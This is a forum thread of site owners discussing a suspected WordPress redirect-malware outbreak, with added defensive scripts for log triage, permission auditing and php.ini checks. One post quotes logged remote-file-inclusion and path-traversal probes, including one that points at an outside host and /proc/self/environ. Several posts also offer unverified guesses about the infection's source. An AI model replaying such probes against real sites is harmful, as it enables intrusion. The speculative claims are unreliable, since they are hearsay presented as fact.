      Sure, a shell script can be uploaded and maybe other accounts are exploited, but in this most recent round it is due to FTP access being gained via trojans.

      I have cleaned this up and watched the FTP logins on a client's site, and it ended up his computer was trojaned. It was almost amusing to watch 3 different IPs log in at almost the same time and start downloading and uploading the index.php.

      PS

      Want to really nip it in the bud? Set all index.php, index.html, main.php, main.htm and config.php files to chmod 0444.

      Even if they have the FTP information, the bots are too stupid to realize it isn't overwriting the files anymore.
  • HeySal
    Dave - you did recreate it - or just didn't get rid of it. The main domain URL still sets off my avast. I'm not going any further on it as I don't want to have to get this thing off of my own computer, too.

    Your FTP is probably compromised. Dump the site - it's not been worked on so not much loss and much easier clean up. Your whole hosting account is probably infested.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

  • lakeview
    Would anyone be able to advise me about this situation, please? After reading this thread, I went to check some things on a new WP self-hosted blog I just installed a couple of weeks ago. It's using version 2.8 and hosted on Hostgator.

    I checked my latest visitors stats and saw something I'm concerned about. It shows:

    Host: 83.148.64.25

    * /featured/how-t%20.../arcade.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../.
    Http Code: 404 Date: Jun 12 09:12:17 Http Version: HTTP/1.1

    * /featured/arcade.php?phpbb_root_path=http://forgottentreasures.net/../proc/self/environ%00
    Http Code: 403 Date: Jun 12 09:28:16 Http Version: HTTP/1.1

    Since this shows 403/404 codes does it mean everything is ok?

    I am so new to WP blogs and this really has me worried.

    Thanks so much for any help you can offer.

    Angela
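The two requests Angela quotes are probes against a phpBB arcade.php script's phpbb_root_path parameter: one with a long ../ chain, one with a remote URL ending in /proc/self/environ%00. As an added example, not from the thread, here is a small triage routine that parses the stats-page layout shown above and flags those patterns; the host and request lines in it are constructed (documentation-range IP, .invalid hostname), not taken from a real log.

```python
"""Triage visitor-stats lines for file-inclusion probes. Added example, not
from the thread; the stats text below is constructed in the layout the post
shows (IP from the documentation range, hostname in .invalid)."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

SAMPLE_STATS = """\
Host: 192.0.2.10

* /featured/how-t%20.../arcade.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../.
Http Code: 404 Date: Jun 12 09:12:17 Http Version: HTTP/1.1

* /featured/arcade.php?phpbb_root_path=http://example.invalid/../proc/self/environ%00
Http Code: 403 Date: Jun 12 09:28:16 Http Version: HTTP/1.1

* /2009/06/hello-world/
Http Code: 200 Date: Jun 12 09:30:02 Http Version: HTTP/1.1
"""

HOST_RE = re.compile(r"^Host:\s*(\S+)")
REQUEST_RE = re.compile(r"^\*\s+(\S+)")
CODE_RE = re.compile(r"^Http Code:\s*(\d{3})\s+Date:\s*(.+?)\s+Http Version:")


def parse_visitor_stats(text):
    """Turn the stats-page layout into dicts of host, path, status code, date."""
    entries, host, path = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if m := HOST_RE.match(line):
            host = m.group(1)
        elif m := REQUEST_RE.match(line):
            path = m.group(1)
        elif (m := CODE_RE.match(line)) and path is not None:
            entries.append({"host": host, "path": path,
                            "code": int(m.group(1)), "date": m.group(2)})
            path = None
    return entries


def classify_request(raw_path):
    """Return the set of file-inclusion indicators present in one request."""
    decoded = unquote(raw_path)  # %2e%2e -> .., %00 -> NUL byte
    indicators = set()
    if "\x00" in decoded:
        indicators.add("null_byte")  # used to cut off a suffix the script appends
    if "/proc/self/environ" in decoded:
        indicators.add("proc_environ")
    if re.search(r"(\.\./){3,}", decoded):
        indicators.add("traversal")  # long ../ chains, not an ordinary relative link
    query = urlsplit(raw_path).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if re.match(r"(https?|ftp)://", value, re.I):
            indicators.add("remote_include:" + name)
        if "../" in value:
            indicators.add("traversal_param:" + name)
    return indicators


def triage(entries):
    """Keep only probe requests. A 4xx means the server refused or could not
    find the target; a 2xx on such a path means it was actually served."""
    findings = []
    for entry in entries:
        indicators = classify_request(entry["path"])
        if indicators:
            findings.append({"host": entry["host"], "code": entry["code"],
                             "served": 200 <= entry["code"] < 300,
                             "indicators": sorted(indicators)})
    return findings


if __name__ == "__main__":
    for finding in triage(parse_visitor_stats(SAMPLE_STATS)):
        print(finding)
```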
    • HeySal
      Originally Posted by lakeview

      Would anyone be able to advise me about this situation, please? After reading this thread, I went to check some things on a new WP self-hosted blog I just installed a couple of weeks ago. It's using version 2.8 and hosted on Hostgator.
      etc

      Angela
      What is your URL? My avast goes off when I land on an infected site - easiest way to tell.
      Signature

      Sal
      When the Roads and Paths end, learn to guide yourself through the wilderness
      Beyond the Path

      • lakeview
        Originally Posted by HeySal

        What is your URL? My avast goes off when I land on an infected site - easiest way to tell.
        HeySal,

        It's Stress Free Wedding Planning

        Thanks so very much!!! I'm in a bit of a panic here.

        Angela
        • HeySal
          Originally Posted by lakeview

          HeySal,

          It's Stress Free Wedding Planning

          Thanks so very much!!! I'm in a bit of a panic here.

          Angela
          So far so good for you Angela - might wanna download some free anti-virus ware that will detect it and just click around it every day - Avast works, I've heard AVG does, too - not sure what else might but I know many don't.

          And if anyone posts codes that you don't understand on your site, just delete them. Not worth the risk, and if they are doing so it's probably just spam at the very least anyway.
          Signature

          Sal
          When the Roads and Paths end, learn to guide yourself through the wilderness
          Beyond the Path

        • Kay King
          You don't need a virus to be going around to be hit if you're running 777 permissions.
          Thanks for asking that and getting it answered. I've been sitting here, too, thinking "why would anyone be running 777 permissions". Seems it's the ability to set 777 that leaves the hole for this one.

          kay
          Signature
          Saving one dog will not change the world - but the world changes forever for that one dog
          ***
          One secret to happiness is to let every situation be
          what it is instead of what you think it should be.
  • ECS Dave
    I copied the code from one of the pages, and uploaded it to virustotal.com and got this result:

    Virustotal. MD5: e47fd7ca9ad1adf9b0f8bba33e19fc5f JS:Bulered JS:Bulered

    And Google's results for "JS:Bulered" are limited, to say the least...

    I tried several online JS decoders, but no go there either...

    Hmmm...

    Be Well!
    ECS Dave
  • DigitalX
    Does this affect someone who has hosted WordPress 2.7 on their shared hosting? I did not upgrade to 2.8 yet...
    • HeySal
      Originally Posted by RobinX

      Does this affect someone who has hosted WordPress 2.7 on their shared hosting? I did not upgrade to 2.8 yet...
      Yes. Upgrading will not keep you from the virus - mine was just updated to 2.8 about an hour before it was whacked.

      Once again - have php, 777 permissions running? You can get hit. Can't get much clearer than that.
      Signature

      Sal
      When the Roads and Paths end, learn to guide yourself through the wilderness
      Beyond the Path

      • Harry Behrens
        Originally Posted by HeySal

        Once again - have php, 777 permissions running? You can get hit. Can't get much clearer than that.
        Whoa whoa whoa... 777 permissions?

        You don't need a virus to be going around to be hit if you're running 777 permissions. That's a huge security hole in and of itself. Anybody with some scripting knowledge and a bit of spare time can hit you like that.

        Always keep 644 permissions on your files and 755 permissions on your directories. Only change that if you specifically need to for a good reason (which, for me, after 5 years of web designing and IM'ing, has never happened).

        If in doubt, ask your hosting customer support what the default file permissions on your server are and how to change them. A lot of the big, good hosting servers that focus on security (e.g. HostGator etc) automatically apply tight permissions to every file behind the scenes. You really want to go with one of these if you're not comfortable with setting everything up on your own.
        Signature

        - Harry Behrens

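Harry's 644-for-files / 755-for-directories baseline and the earlier suggestion to set index.php, config.php and friends to 0444 can both be checked mechanically. As an added example, not code from the thread or from WordPress, the script below audits a constructed WordPress-like tree in a temporary directory for world-writable entries and anything off that baseline, then applies the read-only lock.

```python
"""Permission audit against the 644 / 755 baseline from the post above, plus
the read-only lock on entry-point files suggested earlier in the thread.
Added example, not from the thread; the site tree is constructed in a
temporary directory."""
import os
import stat
import tempfile

FILE_MODE = 0o644
DIR_MODE = 0o755
READ_ONLY = 0o444
# Files the "nip it in the bud" post proposes setting to 0444.
ENTRY_POINTS = {"index.php", "index.html", "main.php", "main.htm", "config.php"}


def audit_permissions(root):
    """Return sorted (relative path, octal mode, reason) for every off-baseline entry."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            full = os.path.join(dirpath, name)
            mode = stat.S_IMODE(os.lstat(full).st_mode)
            rel = os.path.relpath(full, root)
            if mode & stat.S_IWOTH:
                findings.append((rel, oct(mode), "world-writable directory"))
            elif mode != DIR_MODE:
                findings.append((rel, oct(mode), "directory not 755"))
        for name in filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if stat.S_ISLNK(st.st_mode):
                continue  # mode bits on a symlink itself are not meaningful
            mode = stat.S_IMODE(st.st_mode)
            rel = os.path.relpath(full, root)
            if mode & stat.S_IWOTH:
                findings.append((rel, oct(mode), "world-writable file"))
            elif mode not in (FILE_MODE, READ_ONLY):
                findings.append((rel, oct(mode), "file not 644"))
    return sorted(findings)


def lock_entry_points(root, mode=READ_ONLY):
    """chmod the entry-point files to read-only; returns the relative paths changed.
    Read-only files also block WordPress's own upgrader, so reset them before updating."""
    changed = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name in ENTRY_POINTS:
                full = os.path.join(dirpath, name)
                os.chmod(full, mode)
                changed.append(os.path.relpath(full, root))
    return sorted(changed)


def build_sample_site():
    """Constructed WordPress-like tree with two deliberate mistakes:
    a world-writable wp-config.php and a 777 uploads directory."""
    root = tempfile.mkdtemp(prefix="wp-audit-")
    files = ["index.php", "wp-config.php",
             "wp-content/themes/default/style.css",
             "wp-content/uploads/2009/06/photo.jpg"]
    for rel in files:
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("constructed placeholder\n")
        os.chmod(full, FILE_MODE)
    for dirpath, dirnames, _ in os.walk(root):
        for name in dirnames:  # normalise directories regardless of umask
            os.chmod(os.path.join(dirpath, name), DIR_MODE)
    os.chmod(os.path.join(root, "wp-config.php"), 0o666)
    os.chmod(os.path.join(root, "wp-content", "uploads"), 0o777)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for finding in audit_permissions(site):
        print(*finding)
    print("locked:", lock_entry_points(site))
```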
    • Nightengale
      Ok, I downloaded the free version of Avast (v. 4.8) and ran it while browsing my WP site. I'm not at all familiar with Avast so it took some clicking around before I figured it out.

      I clicked on "Web Shield" in the Avast utility and then browsed my site. According to Avast, I have no infections. (Whew!)

      Does this sound right? Did I do it right?

      If so, how do I now protect myself from this virus? Like most people here, I've invested A LOT of time and money into my site. I DO NOT need the headaches. (Like anyone else does!)

      "An ounce of prevention...." as they say. How do I now protect myself?

      Thanks,
      Michelle
      Signature
      "You can't market here. This is a marketing discussion forum!"
  • Leon McKee
    Sal, I wanted to clarify what you had been doing when this all started for this specific occurrence. You indicated it was wordpress.com so did this happen on the wordpress.com site or "your" hosted site while browsing themes in WP 2.8? I'm wondering if you had been actually accessing the wordpress.org site via the "add new themes" option?

    Leon McKee
  • lakeview
    Thank you so much for checking HeySal!!

    I'm using AVG and nothing was detected. I know practically nothing about WP, but my issue looks to be possible attempted (unsuccessful) attacks. It also started shortly after I upgraded to WP 2.8.

    Angela
  • HeySal
    Dave - I had previewed two themes - went to do a new search, I didn't check anything on the form but clicked to search. I had page 6 almost loaded when Avast went off, so as far as I can tell it was page 6 of a general search with no parameters selected.

    Ken - this isn't spyware - other than eventually it will deliver a rootkit (keylogger). It's a malicious worm that creates security holes, deposits false JS codes that redirect people from your site, then if unstopped lets in a rootkit to collect ALL data. Loads of fun. Toy compliments of Russia.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

  • Leon McKee
    Thanks Dave! I'm starting to get the big picture now and the 777 clarification from Sal helps a lot. I'll check back later to see how this thread is coming along.

    Leon McKee
  • HeySal
    hmbehrens - that is correct. But some people need to know that. That is only one of its targets - it's the programs that you can run 777 on themselves that are targeted no matter what permissions you have set.

    Peter - that is why I use Avast -never had a false positive yet.

    I just was reading and I saw that if you turn off your JS in your browser you can see these codes. Might be worth a try.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    • Harry Behrens
      Originally Posted by HeySal

      hmbehrens - that is correct. But some people need to know that. That is only one of its targets - it's the programs that you can run 777 on themselves that are targeted no matter what permissions you have set.
      Yep, I agree. I didn't mean to sound like I was dismissing your warning or anything like that, I was just noting it for anyone who might not know.

      In general one should always have Avast or some other good and up-to-date antivirus with web-detect and blocking capabilities running. And keep alert for anything weird.
      Signature

      - Harry Behrens

  • Peter Bestel
    Sal,

    I was running an up-to-date version of Avast when I got infected - 'something' disabled it and I couldn't switch it back on!!!

    I downloaded AVG and uninstalled Avast.

    I hear the new version of Norton is actually very good (horror of horrors) but it's true. May consider that.

    Peter
  • oregoncountry
    I can't even find my post. What should I do? I just did a WP blog today, I worked so hard, and now I'm hearing there's a virus there? I just had my ISP satellite fried by lightning, as well as my antenna. I was out of commission (literally) for 8 days. Can someone help me? Denise

    I have AVG, and Avast is now installing so I can run it.
  • MizzCindy
    OK, I'm a bit confused, so please bear with me...

    You are running wordpress version 2.7.1. Correct?

    You were viewing available themes from wordpress.com and became infected via that route. Still correct?

    You arrived at the themes gallery (browsed to page 6) by clicking the 'Wordpress Theme Directory' link under 'Get More Themes' at the bottom of the 'Manage Themes' page under 'Appearance'. Am I still with the program?

    Now here's where my confusion comes in. I'm not understanding how you ended up at wordpress.com. When I mouse over the 'Get More Themes' link, it points to wordpress.org/extend/themes. So what am I missing? Does that link redirect to wordpress.com?

    I definitely want to understand this, since I have several wp blogs and I'm not too keen on having them go down in hacker-induced flames. Sorry if my post comes off as grilling you, I just want to make sure I'm clear on what happened...especially since I was just at wordpress.org earlier today browsing the themes. So far, no sign of any infestation, but now I'm a bit panicked!

    Thanks!
    Cindy
    • Ken Strong
      Originally Posted by MizzCindy

      Now here's where my confusion comes in. I'm not understanding how you ended up at wordpress.com. When I mouse over the 'Get More Themes' link, it points to wordpress.org/extend/themes. So what am I missing? Does that link redirect to wordpress.com?
      Here's what they have to say at the .com version about that:
      Something that has confused many people is the distinction between WordPress.org and WordPress.com. Let's clear it up. WordPress.com is brought to you by some of the same folks who work on WordPress, the open source blogging software. In addition, WordPress.com utilizes the same WordPress software which you can download at WordPress.org. With WordPress.com the hosting and managing of the software is taken care of by the team here at Automattic. With WordPress.org you need to install the software on your own server or with a 3rd party provider.
      So apparently two totally separate websites. So if one is infected, the other one isn't necessarily.
  • HeySal
    Cindy - if mouse over says .org then it was .org. I'm not going back in to check that fact. I tried both .com and .org without logging in later, but from those pages it looked like .com had the theme directory. SO if I am wrong on that one, so be it - but I am not wrong about being in the theme directory and part of the url my avast gave me was:
    wordpress.com or net /????/install/ and at that point I was out of there so don't know the exact URL and didn't feel like sticking around to find out.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

  • MizzCindy
    Thanks, Sal!

    So at that time were you actually attempting to download a theme or were you just browsing?

    I was browsing themes earlier today but didn't download any. I also didn't get to the wordpress themes gallery through my admin page. I went there just by typing the url into my browser.

    It doesn't sound like you've had very much fun today! I'm sorry you've had to deal with this.

    Cindy
  • MizzCindy
    Thanks, to you, too, Ken! That's what I was thinking. Good to know I'm on the right track.

    So I wonder...if Sal saw a path that wasn't correct, could something hinky be going on with her computer or her site rather than the wordpress site?

    Or perhaps it was the .org path and Sal just didn't have time to see it fully while trying to get the heck out of there! I know that would be my first priority, too!

    Understanding where the infection came from is a pretty big deal, since that will have much to do with how high the risk is for everyone else and what behaviors we need to avoid.

    I'll say it again, Sal, I'm sorry you're having to deal with this mess. Not the most fun way to spend a Friday night.

    Cindy
  • HeySal
    I had previewed 2, Cindy - but couldn't find what I wanted, so I had not attempted to install anything - but that's how these redirects work. You are right - when my Avast went off I cut the connection as fast as possible, but I truly thought that the theme menu was on .com. So that is wrong - people still know that they are at risk going in and browsing for themes at the least - for all I know the plugins and the Widgets have been hit, too. I'm sure not going to check them out for awhile.
    I figured .org and .com were the same owners - so sent the support ticket to .org which actually accepts support tickets. The tech that is doing that site sent more info to them and probably much more accurate. Now we just have to hope that they know what they are doing at wordpress to get rid of it.

    I'm out of here - if I haven't already said it, I don't know what else to add, there are people online that can probably explain this all with much more technical intelligence than I possess - I just thought people better know that wordpress itself was infected.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

  • MizzCindy
    Sal, thanks for taking the time to put out a warning.

    Cindy
  • John_Cross
    Banned
    [DELETED]
  • Peter Bestel
    WARNING!! (Now not needed because post deleted, thanks guys)

    Until it is deleted, do not attempt to check the website in the above post by John_Cross.

    It links to pornographic site!!

    Never click a link from someone with such few posts - there's more than one reason why new members can't post links.

    Peter
  • MizzCindy
    One thing I strongly suggest is to check out Craig Desorcy's ebook on securing your wordpress blog: Blog Lockdown (I think that's the name)!

    It's easy to follow and straight-forward, but provides some very powerful information on what you need to do to greatly decrease many of the security threats out there.

    Cindy
  • zulfnore
    There seems to be a little bit of confusion here!
    For clarification purposes, what I understand of the virus and its effect is that it attacks anything running on PHP that has JS attached to it. It is not correct to single out WP as the culprit or the only affected software.

    Most of the issues that are being reported around WP are because of the environment it uses (i.e. PHP and JS). To minimise the chances of being infected: 1) ask your hosting company to upgrade you to the latest version of PHP, and 2) deactivate all plug-ins that rely on JS to function till the security has been beefed up on your server.

    As an added precaution: only install themes from trusted vendors, and if you can, try not to add new themes to your site until the threat has subsided.

    Once again, the vulnerability is with PHP and JS, not WP.
  • HeySal
    With all due respect back at you -- I know where I was when I was alerted to the virus and I was in the themes on wordpress. That's just the way it is and I don't care who has never had a virus and who has, that's where I got the alert and when the problem started.

    If you think this is a minor problem or limited to just a few hosts, go ahead and think it. I'm not going to argue with you. I am giving this warning based on the experience I had at the wordpress site - not on second hand information.

    ALL I can say to your comments is that this is the first virus to ever hit my tech as well and I KNOW HIS credentials.......so good luck with this one.
    Signature

    Sal
    When the Roads and Paths end, learn to guide yourself through the wilderness
    Beyond the Path

    • rosetrees
      Thanks for the warning Sal. I backed up all my WP databases last night. I just wonder if, perhaps, you think the problem could have been an attack via your ISP?

      I ask because a couple of years ago I saw several computers infected with a worm that redirected to a p*** site. The common factor was the ISP.
    • jtpratt
      Banned
      [DELETED]
      • ExRat
        Hi Sal,

        the wordpress community is SO LARGE worldwide that if this were a huge problem (with a base of hundreds of millions of blogs installed on web hosts), it would be all over google and social media
        jtpratt does have a point there.

        I know where I was when I was alerted to the virus and I was in the themes on wordpress
        With respect, that doesn't really prove anything in relation to wordpress.com having a virus or not.
        Signature


        Roger Davis

        • ebuyer123
          Thanks for ALL that good advice and valuable information.

          Now...how do I know if my WP or any other PHP based websites have been infected by this JS SOB malware?

          Simply do a virus scan or what? (or spyware scan...which one??)

          Regards,
          • jtpratt
            Banned
            [DELETED]
            • ebuyer123
              Originally Posted by jtpratt

              You cannot virus or spyware scan wordpress on your host or php pages, etc. If your site was hacked it will show signs of it, odd content, redirection of pages, spam comments, or it will just go down.
              Thanks for the information, JTPratt.

              So it is my hosting company that has to take care of the problem when my WP sites are infected or hacked?
              • Profile picture of the author ECS Dave
                Originally Posted by ebuyer123 View Post

                Thanks for the information, JTPratt.

                So it is my hosting company that has to take care of the problem when my WP sites are infected or hacked?
                Or you can go through how ever many files you have, and delete the code by hand... Not a fun task...

                Be Well!
                ECS Dave
              • Profile picture of the author jtpratt
                Banned
                [DELETED]
                • Profile picture of the author ebuyer123
                  Thanks for all the critical advice and vital info, mates.

                  By the way, where can I get a legitimate wordpress exploit checker? What does this tool do: find 777 file permissions, or anything else?

                  Regards,
                  • Profile picture of the author Peter Bestel
                    Originally Posted by ebuyer123 View Post

                    Thanks for all the critical advice and vital info, mates.

                    By the way, where can I get a legitimate wordpress exploit checker? What does this tool do: find 777 file permissions, or anything else?

                    Regards,
                    There are two tools you'd be advised to have on all your WP blogs.

                    Exploit Scanner and WP Security Scan

                    You can download the Exploit Scanner from Wordpress at WordPress › WordPress Exploit Scanner WordPress Plugins

                    or direct from the author:

                    WordPress Exploit Scanner

                    This will point out any suspect coding within your files and dodgy plugins and themes.

                    The WP Security Scan will assess and recommend changes to file permissions, database security, passwords etc. You can download that from WordPress › WP Security Scan WordPress Plugins

                    Hope that helps.

                    I appear to have had the same trouble with my blogs as HeySal, more than likely originating from my compromised PC subsequently attacking my server. Personally, I've not witnessed any malicious activity direct from the Wordpress sites. Yes, while I was cleaning everything up I got an Avast warning whilst within my dashboard but this was caused by 'hacked' files within my own WP installation.

                    Peter
                    • Profile picture of the author ebuyer123
                      Originally Posted by Peter Bestel View Post

                      There are two tools you'd be advised to have on all your WP blogs.

                      Exploit Scanner and WP Security Scan

                      You can download the Exploit Scanner from Wordpress at WordPress › WordPress Exploit Scanner WordPress Plugins

                      or direct from the author:

                      WordPress Exploit Scanner

                      This will point out any suspect coding within your files and dodgy plugins and themes.

                      The WP Security Scan will assess and recommend changes to file permissions, database security, passwords etc. You can download that from WordPress › WP Security Scan WordPress Plugins Peter
                      Many thanks, Peter.

                      This wp virus stuff is both troublesome and time consuming especially for non-IT folks.

                      Regards,
                    • Profile picture of the author ebuyer123
                      Originally Posted by Peter Bestel View Post

                      There are two tools you'd be advised to have on all your WP blogs.

                      Exploit Scanner and WP Security Scan

                      WordPress › WordPress Exploit Scanner WordPress Plugins

                      This will point out any suspect coding within your files and dodgy plugins and themes.

                      The WP Security Scan will assess and recommend changes to file permissions, database security, passwords etc. WordPress › WP Security Scan WordPress Plugins
                      Hi,
                      Now I already have these two big boys installed on my wp site, but how am I going to use them? I mean, how do I start a scan?

                      Does that mean if I have 10 wp sites, then I have to do 10 separate installations for all my sites?

                      Thanks.
                      • Profile picture of the author Peter Bestel
                        Originally Posted by ebuyer123 View Post

                        Hi,
                        Now I already have these two big boys installed on my wp site, but how am I going to use them? I mean, how do I start a scan?

                        Does that mean if I have 10 wp sites, then I have to do 10 separate installations for all my sites?

                        Thanks.
                        As far as I know, yes, you have to perform the scans on each and every blog.

                        Running them is easy. After install, go to your WP dashboard. Expand the Dashboard menu and you'll notice "Exploit Scanner". Click this and then select 'Search Files and Database'. I can't help you with the results as I'm no expert, best to Google any results you're not sure of.

                        With The Security Scanner you should have an extra menu at the bottom of your WP Dashboard home menu labelled 'Security'. Click this to see its suggestions.

                        Once again, I'm no expert in how to interpret the results, but if you purchase Craig Desorcy's product, Blog Lock Down, he goes into detail - well worth the investment.

                        Peter
            • Profile picture of the author ECS Dave
              Originally Posted by jtpratt View Post

              You cannot virus or spyware scan wordpress on your host or php pages, etc. If your site was hacked it will show signs of it, odd content, redirection of pages, spam comments, or it will just go down.

              If your Windows based computer was infected from browsing or installing a rogue theme your antivirus should go off and alert you.
              Just a thought...

              You might want to rephrase...


              If your site was hacked it MAY show signs of it, odd content, redirection of pages, spam comments, or it will just go down.
              From my reading/research, a good many exploits, script injections, what-have-you,
              also work quite silently in the background, doing their damage...

              If your Windows based computer was infected from browsing or installing a rogue theme your antivirus should go off and alert you.
              There's also a great many not-so-tech-savvy computer owners/users who
              have a FALSE sense of security, running an old or outdated virus protection utility,
              or one that has not been updated with the latest "definitions".
              And, not all VDU's are created equal...

              Be Well!
              ECS Dave
      • Profile picture of the author ECS Dave
        Originally Posted by jtpratt View Post

        My word on this matter doesn't have to be believed, just start googling...the day that there are thousands+ relevant results for the keywords "wordpress js redirect virus" you will be right. I am betting my reputation that today, tomorrow, next week, next month, the rest of the year, and future forward there will NEVER be any results for this.

        The day it's a widespread problem is the day you can find it easily all over the web, and not in just this forum thread.
        If you don't limit the search with "quotes",
        wordpress js redirect virus - Google Search
        there are ~41,000 results on google...

        If you think about this, when a new exploit is found, exactly how
        many results are you going to find? How many updates to wordpress
        have there been? Other PHP software? Other software? Hardware?

        Be Well!
        ECS Dave
  • Profile picture of the author ECS Dave
    Hello Warriors,

    As I stated in a previous reply (and as HeySal stated), this issue appeared to
    occur when Sal was browsing themes, using the Add New Themes interface,
    on a self-hosted, self-installed, wordpress blog. At the time she was browsing
    the themes, the blog was 2.7, as provided by the fantastico utility.

    Further investigation, by me, showed that the host got "hacked", "injected",
    whatever you wish to term it, across multiple sites on "my" account. My host's
    tech support team is still investigating this issue.

    Now whether or not the "hack" did, or did not come from Sal's theme browsing
    is certainly something that needs investigating as well. With the HUGE number
    of themes that can be seen from "browsing", it's quite possible that one, or more
    could be, or had/have been compromised.

    I am not here to point fingers, make accusations, or the like. We are all human,
    and are not perfect. The software is written by humans, the themes, etc...

    The sub-humans that derive such joy from f'ing things up are there, doing
    what they do, and we try to do our best to shield ourselves, and our sites
    from them. Discoveries, such as Sal's, are what help us combat this scourge.

    Be Well!
    ECS Dave
    • Profile picture of the author stevenh512
      Originally Posted by ECS Dave View Post

      At the time she was browsing the themes, the blog was 2.7, as provided by the fantastico utility.
      In my experience (not just with Wordpress, this goes for any script) installing the latest version by hand is almost always a better option than using Fantastico. Once you get the hang of it, you can install a script by hand almost as fast as Fantastico can (or I can anyway, especially on hosts like HostGator where you don't have to fool with permissions). If you look at the changelogs and fixed tickets for the 2.7.1 and 2.8 release you'll see quite a few security problems that were fixed in that time along with all the "eye candy" and API improvements they've given us.

      Now whether or not the "hack" did, or did not come from Sal's theme browsing is certainly something that needs investigating as well. With the HUGE number of themes that can be seen from "browsing", it's quite possible that one, or more could be, or had/have been compromised.
      I'm not sure that simply browsing themes would open you up to a vulnerability like this (installing a theme, on the other hand, could). I'm curious, were there older versions of any other scripts that have recently had widely exploited code injection vulnerabilities? For example, SMF up to and including version 1.8 was being hacked like crazy and the hacker usually planted a "php virus" that would infect a whole hosting account like this with javascript iframes and redirects. There was a similar exploit in a few gallery scripts recently, and I've heard of people being hacked through PHPBB but in that case I'm not sure if the exploit (or the usual result) is the same.

      edit: to clarify above and add this..

      Speaking of HostGator, some of their PHP settings are "bad" out of the box. PHP register_globals is on (opens up quite a few scripts to code injection, SQL injection, cross-site scripting and other exploits), magic_quotes_gpc is off (opens up SQL injection exploits in scripts that don't properly "sanitize" form input.. I know of two widely-used IM scripts that have this problem). Personally I don't like allow_url_fopen (I'd rather use curl for that lol) but a lot of PayPal IPN scripts use it so I went ahead and left that one on. You can get to these settings (on HostGator anyway) by scrolling down to "Software / Services" in your cpanel and clicking "php.ini QuickConfig".
      Signature

      This signature intentionally left blank.

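The php.ini directives named in the post above can be checked from a shell rather than by eye. The script below is an added example written for this thread, not code from the post's author or from HostGator; it assumes the account's php.ini is readable and passed as an argument, the sample file it writes is constructed to mirror the settings described, and it deliberately leaves allow_url_fopen alone for the reason the post gives.

```sh
#!/bin/sh
# Added example (not from the thread): audit a php.ini for the directives
# discussed above and write a hardened copy. Paths are taken as arguments.

# Effective value of a directive: comments stripped, last assignment wins.
php_ini_get() {                        # usage: php_ini_get FILE DIRECTIVE
    sed -e 's/[;#].*$//' "$1" \
      | grep -i "^[[:space:]]*$2[[:space:]]*=" \
      | tail -n 1 \
      | sed -e 's/^[^=]*=[[:space:]]*//' -e 's/[[:space:]"]*$//' -e 's/^"//'
}

# True when a PHP boolean value means "on".
php_bool_on() {                        # usage: php_bool_on VALUE
    case "$(printf '%s' "$1" | tr 'A-Z' 'a-z')" in
        on|1|true|yes) return 0 ;;
        *) return 1 ;;
    esac
}

# One line per risky directive, nothing for a clean file; always exits 0.
# allow_url_fopen is not flagged (the post notes IPN scripts need it), and
# magic_quotes_gpc is not worth auditing: it was removed in PHP 5.4, and
# parameterised queries are the real fix for SQL injection.
audit_php_ini() {                      # usage: audit_php_ini FILE
    if php_bool_on "$(php_ini_get "$1" register_globals)"; then
        echo "register_globals=On: request parameters become PHP globals"
    fi
    if php_bool_on "$(php_ini_get "$1" allow_url_include)"; then
        echo "allow_url_include=On: include()/require() accept remote URLs"
    fi
    if php_bool_on "$(php_ini_get "$1" display_errors)"; then
        echo "display_errors=On: errors leak file paths and queries to visitors"
    fi
    return 0
}

# Exit 0 when the audit finds nothing.
php_ini_is_hardened() {                # usage: php_ini_is_hardened FILE
    [ "$(audit_php_ini "$1" | wc -l | tr -d ' ')" -eq 0 ]
}

# Hardened copy: drop the three directives and append them as Off.
harden_php_ini() {                     # usage: harden_php_ini SRC DST
    grep -Eiv '^[[:space:]]*(register_globals|allow_url_include|display_errors)[[:space:]]*=' "$1" > "$2" || true
    printf '\n; set by harden_php_ini\nregister_globals = Off\nallow_url_include = Off\ndisplay_errors = Off\n' >> "$2"
}

# Constructed sample mirroring the "bad out of the box" settings described.
write_sample_php_ini() {               # usage: write_sample_php_ini FILE
    cat > "$1" <<'EOF'
; constructed sample, not any real host's file
register_globals = On
magic_quotes_gpc = Off
allow_url_fopen = On
allow_url_include = On
display_errors = On
;register_globals = Off   <- commented out, must be ignored
EOF
}

# Stand-alone use: sh php_ini_audit.sh /path/to/php.ini
if [ $# -gt 0 ]; then
    audit_php_ini "$1"
    if php_ini_is_hardened "$1"; then echo "no findings in $1"; fi
fi
```

On a cPanel host the file to pass is the one "php.ini QuickConfig" writes into the account; on a host you control it is whatever `php --ini` reports as the loaded configuration file.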
  • Profile picture of the author HeySal
    DAVE --- UH...I was searching AFTER you already updated the script.

    Here's more information about these infections for those of you who are worried and those of you who feel you know too much to be concerned about this crap. Most of what I am googling is still individual users asking for help when they are hit with this - being that the search turned up results in the millions, this might not be as negligible as some would like you to believe. Anyway - some interesting links below.

    If you think you can't get it - remember this - you might be safe from drive by sites - but it was delivered to MY main site by a live hacker who signed on as a member. It wasn't just a drive by bot locating us.

    From what I have read, these redirects have been around for awhile .......but they are now more virulent because they are now using encryption.

    I'm not going to apologize for my report that I got this from wordpress itself. Who knows if some of their themes are infected when they accept them - who knows what else might have happened or what hacker might find their way in.
    I was browsing their themes and the address of the damned virus was www.wordpress..../install/
    For my money that means ON their site and they have gotten 2 reports about it now so let them sort it out. I have reported this event just as it happened to me. Let THEM tell me I didn't get it there. I haven't heard that yet. I am sure waiting to.



    a bit of an explanation
    Virus Bulletin : News - Hundreds of legitimate websites being hacked into

